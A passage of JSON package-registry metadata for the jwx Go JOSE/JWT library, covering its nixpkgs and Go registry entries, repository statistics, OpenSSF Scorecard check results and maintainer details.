wx/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/refs/heads/develop/v3","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/sbom","scorecard":{"id":371885,"data":{"date":"2025-08-11","repo":{"name":"github.com/lestrrat-go/jwx","commit":"568c2c84f11f47f53126b44bf3a3d76993038cba"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":6.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":0,"reason":"Found 0/23 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:28","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:29","Warn: no topLevel permission defined: .github/workflows/assign-issue.yml:1","Warn: no topLevel permission defined: .github/workflows/assign-pr.yml:1","Warn: no topLevel permission defined: .github/workflows/autodoc.yml:1","Warn: no topLevel permission defined: .github/workflows/benchmark.yml:1","Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Warn: no topLevel permission defined: .github/workflows/codeql.yml:1","Warn: no topLevel permission defined: .github/workflows/dependabot.yml:1","Warn: no topLevel permission defined: .github/workflows/lint.yml:1","Warn: no topLevel permission defined: .github/workflows/smoke.yml:1","Warn: no topLevel permission defined: .github/workflows/stale.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Pinned-Dependencies","score":6,"reason":"dependency not pinned by hash detected -- score normalized to 6","details":["Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/ci.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:47: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: goCommand not pinned by hash: .github/workflows/benchmark.yml:33","Warn: goCommand not pinned by hash: .github/workflows/ci.yml:36","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:42","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:44","Info:  15 out of  18 GitHub-owned GitHubAction dependencies pinned","Info:   4 out of   5 third-party GitHubAction dependencies pinned","Info:   2 out of   6 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 24 commits out of 27 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T13:10:24.800Z","repository_id":37406150,"created_at":"2025-08-18T13:10:24.800Z","updated_at":"2025-08-18T13:10:24.800Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30897961,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-24T08:58:18.477Z","status":"ssl_error","status_checked_at":"2026-03-24T08:57:59.595Z","response_time":106,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2026-03-25T17:02:36.760Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:nix/jwx?channel=unstable","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/jwx","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/jwx","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/jwx/dependencies","status":null,"funding_links":["https://github.com/sponsors/lestrrat"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-23T10:02:05.442Z","issues_count":94,"pull_requests_count":747,"avg_time_to_close_issue":3354245.694117647,"avg_time_to_close_pull_request":304118.8680351906,"issues_closed_count":85,"pull_requests_closed_count":682,"pull_request_authors_count":27,"issue_authors_count":64,"avg_comments_per_issue":3.978723404255319,"avg_comments_per_pull_request":0.5903614457831325,"merged_pull_requests_count":577,"bot_issues_count":1,"bot_pull_requests_count":372,"past_year_issues_count":13,"past_year_pull_requests_count":196,"past_year_avg_time_to_close_issue":210964.44444444444,"past_year_avg_time_to_close_pull_request":191349.9512195122,"past_year_issues_closed_count":9,"past_year_pull_requests_closed_count":164,"past_year_pull_request_authors_count":10,"past_year_issue_authors_count":11,"past_year_avg_comments_per_issue":2.923076923076923,"past_year_avg_comments_per_pull_request":0.2857142857142857,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":80,"past_year_merged_pull_requests_count":143,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/issues","maintainers":[{"login":"lestrrat","count":345,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}],"active_maintainers":[{"login":"lestrrat","count":104,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/jwx/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/jwx/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/jwx/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/jwx/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/jwx/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages/jwx/codemeta","maintainers":[{"uuid":"arianvp","login":null,"name":"Arian van Putten","email":"arian.vanputten@gmail.com","url":"https://github.com/arianvp","packages_count":47,"html_url":null,"role":null,"created_at":"2026-03-06T09:24:49.969Z","updated_at":"2026-03-06T09:24:49.969Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/maintainers/arianvp/packages"},{"uuid":"flokli","login":null,"name":"Florian Klink","email":"flokli@flokli.de","url":"https://github.com/flokli","packages_count":116,"html_url":null,"role":null,"created_at":"2026-03-06T09:24:50.022Z","updated_at":"2026-03-06T09:24:50.022Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/maintainers/flokli/packages"}],"registry":{"name":"nixpkgs-unstable","url":"https://channels.nixos.org/nixos-unstable","ecosystem":"nixpkgs","default":true,"packages_count":148389,"maintainers_count":4711,"namespaces_count":0,"keywords_count":2908,"github":"NixOS","metadata":{"funded_packages_count":1599},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:52.762Z","updated_at":"2026-06-10T05:16:03.119Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-unstable/namespaces"}},{"id":13175280,"name":"jwx","ecosystem":"nixpkgs","description":" Implementation of various JWx (Javascript Object Signing and Encryption/JOSE) technologies","homepage":"https://github.com/lestrrat-go/jwx","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2026-02-01T23:16:33.457Z","latest_release_published_at":"2026-02-01T23:16:33.457Z","latest_release_number":"2.0.21","last_synced_at":"2026-03-08T21:13:50.316Z","created_at":"2026-02-01T23:16:28.937Z","updated_at":"2026-03-25T17:02:36.806Z","registry_url":"https://search.nixos.org/packages?channel=24.05\u0026query=jwx","install_command":"nix-env -iA nixpkgs.jwx","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-24.05/pkgs/tools/security/jwx/default.nix#L23","metadata":{"nix_attribute":"jwx-2.0.21","position":"pkgs/tools/security/jwx/default.nix:23","platforms":["x86_64-darwin","i686-darwin","aarch64-darwin","armv7a-darwin","aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mips-linux","mips64-linux","mips64el-linux","mipsel-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux"],"broken":false,"insecure":false,"unfree":false,"outputs":["out"]},"repo_metadata":{"id":37406150,"uuid":"45516769","full_name":"lestrrat-go/jwx","owner":"lestrrat-go","description":"Complete implementation of JWx (Javascript Object Signing and Encryption/JOSE) technologies for Go. #golang #jwt #jws #jwk #jwe","archived":false,"fork":false,"pushed_at":"2026-03-23T20:34:17.000Z","size":21587,"stargazers_count":2339,"open_issues_count":5,"forks_count":192,"subscribers_count":24,"default_branch":"develop/v3","last_synced_at":"2026-03-24T15:23:41.313Z","etag":null,"topics":["go","golang","jwe","jwk","jws","jwt","oidc"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/lestrrat-go.png","metadata":{"files":{"readme":"README.md","changelog":"Changes","contributing":".github/CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","dco":null,"cla":null},"funding":{"github":["lestrrat"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-11-04T05:12:52.000Z","updated_at":"2026-03-23T20:34:22.000Z","dependencies_parsed_at":"2023-09-23T13:31:33.054Z","dependency_job_id":"8122a1a4-053c-4ee5-9b97-9972c16335ef","html_url":"https://github.com/lestrrat-go/jwx","commit_stats":{"total_commits":1692,"total_committers":66,"mean_commits":"25.636363636363637","dds":0.3427895981087471,"last_synced_commit":"f0730766974533dcd9e5f8074a0adfcc471b0f0a"},"previous_names":["lestrrat/jwx"],"tags_count":106,"template":false,"template_full_name":null,"purl":"pkg:github/lestrrat-go/jwx","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/refs/heads/develop/v3","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/sbom","scorecard":{"id":371885,"data":{"date":"2025-08-11","repo":{"name":"github.com/lestrrat-go/jwx","commit":"568c2c84f11f47f53126b44bf3a3d76993038cba"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":6.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":0,"reason":"Found 0/23 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:28","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:29","Warn: no topLevel permission defined: .github/workflows/assign-issue.yml:1","Warn: no topLevel permission defined: .github/workflows/assign-pr.yml:1","Warn: no topLevel permission defined: .github/workflows/autodoc.yml:1","Warn: no topLevel permission defined: .github/workflows/benchmark.yml:1","Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Warn: no topLevel permission defined: .github/workflows/codeql.yml:1","Warn: no topLevel permission defined: .github/workflows/dependabot.yml:1","Warn: no topLevel permission defined: .github/workflows/lint.yml:1","Warn: no topLevel permission defined: .github/workflows/smoke.yml:1","Warn: no topLevel permission defined: .github/workflows/stale.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Pinned-Dependencies","score":6,"reason":"dependency not pinned by hash detected -- score normalized to 6","details":["Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/ci.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:47: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: goCommand not pinned by hash: .github/workflows/benchmark.yml:33","Warn: goCommand not pinned by hash: .github/workflows/ci.yml:36","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:42","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:44","Info:  15 out of  18 GitHub-owned GitHubAction dependencies pinned","Info:   4 out of   5 third-party GitHubAction dependencies pinned","Info:   2 out of   6 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 24 commits out of 27 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T13:10:24.800Z","repository_id":37406150,"created_at":"2025-08-18T13:10:24.800Z","updated_at":"2025-08-18T13:10:24.800Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30897961,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-24T08:58:18.477Z","status":"ssl_error","status_checked_at":"2026-03-24T08:57:59.595Z","response_time":106,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2026-03-25T17:02:36.806Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:nix/jwx?channel=24.05\u0026repository_url=https://channels.nixos.org/nixos-24.05","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/jwx","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/jwx","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/jwx/dependencies","status":null,"funding_links":["https://github.com/sponsors/lestrrat"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-23T10:02:05.442Z","issues_count":94,"pull_requests_count":747,"avg_time_to_close_issue":3354245.694117647,"avg_time_to_close_pull_request":304118.8680351906,"issues_closed_count":85,"pull_requests_closed_count":682,"pull_request_authors_count":27,"issue_authors_count":64,"avg_comments_per_issue":3.978723404255319,"avg_comments_per_pull_request":0.5903614457831325,"merged_pull_requests_count":577,"bot_issues_count":1,"bot_pull_requests_count":372,"past_year_issues_count":13,"past_year_pull_requests_count":196,"past_year_avg_time_to_close_issue":210964.44444444444,"past_year_avg_time_to_close_pull_request":191349.9512195122,"past_year_issues_closed_count":9,"past_year_pull_requests_closed_count":164,"past_year_pull_request_authors_count":10,"past_year_issue_authors_count":11,"past_year_avg_comments_per_issue":2.923076923076923,"past_year_avg_comments_per_pull_request":0.2857142857142857,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":80,"past_year_merged_pull_requests_count":143,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/issues","maintainers":[{"login":"lestrrat","count":345,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}],"active_maintainers":[{"login":"lestrrat","count":104,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/jwx/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/jwx/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/jwx/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/jwx/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/jwx/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/jwx/codemeta","maintainers":[{"uuid":"flokli","login":null,"name":"Florian Klink","email":"flokli@flokli.de","url":"https://github.com/flokli","packages_count":79,"html_url":null,"role":null,"created_at":"2026-03-08T21:13:50.589Z","updated_at":"2026-03-08T21:13:50.589Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/maintainers/flokli/packages"},{"uuid":"arianvp","login":null,"name":"Arian van Putten","email":"arian.vanputten@gmail.com","url":"https://github.com/arianvp","packages_count":11,"html_url":null,"role":null,"created_at":"2026-03-08T21:13:50.494Z","updated_at":"2026-03-08T21:13:50.494Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/maintainers/arianvp/packages"}],"registry":{"name":"nixpkgs-24.05","url":"https://channels.nixos.org/nixos-24.05","ecosystem":"nixpkgs","default":false,"packages_count":116156,"maintainers_count":3383,"namespaces_count":0,"keywords_count":654,"github":"NixOS","metadata":{"funded_packages_count":264},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:53.309Z","updated_at":"2026-06-09T05:04:49.559Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/namespaces"}},{"id":11403463,"name":"github.com/lestrrat-go/jwx/v2/internal/pool","ecosystem":"go","description":"","homepage":"https://github.com/lestrrat-go/jwx","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":[],"namespace":"github.com/lestrrat-go/jwx/v2/internal","versions_count":0,"first_release_published_at":null,"latest_release_published_at":"2025-12-16T21:07:21.106Z","latest_release_number":null,"last_synced_at":"2026-06-03T08:31:00.719Z","created_at":"2025-03-04T17:52:52.271Z","updated_at":"2026-06-03T08:31:00.720Z","registry_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/v2/internal/pool","install_command":"go get github.com/lestrrat-go/jwx/v2/internal/pool","documentation_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/v2/internal/pool#section-documentation","metadata":{},"repo_metadata":{"id":37406150,"uuid":"45516769","full_name":"lestrrat-go/jwx","owner":"lestrrat-go","description":"Complete implementation of JWx (Javascript Object Signing and Encryption/JOSE) technologies for Go. #golang #jwt #jws #jwk 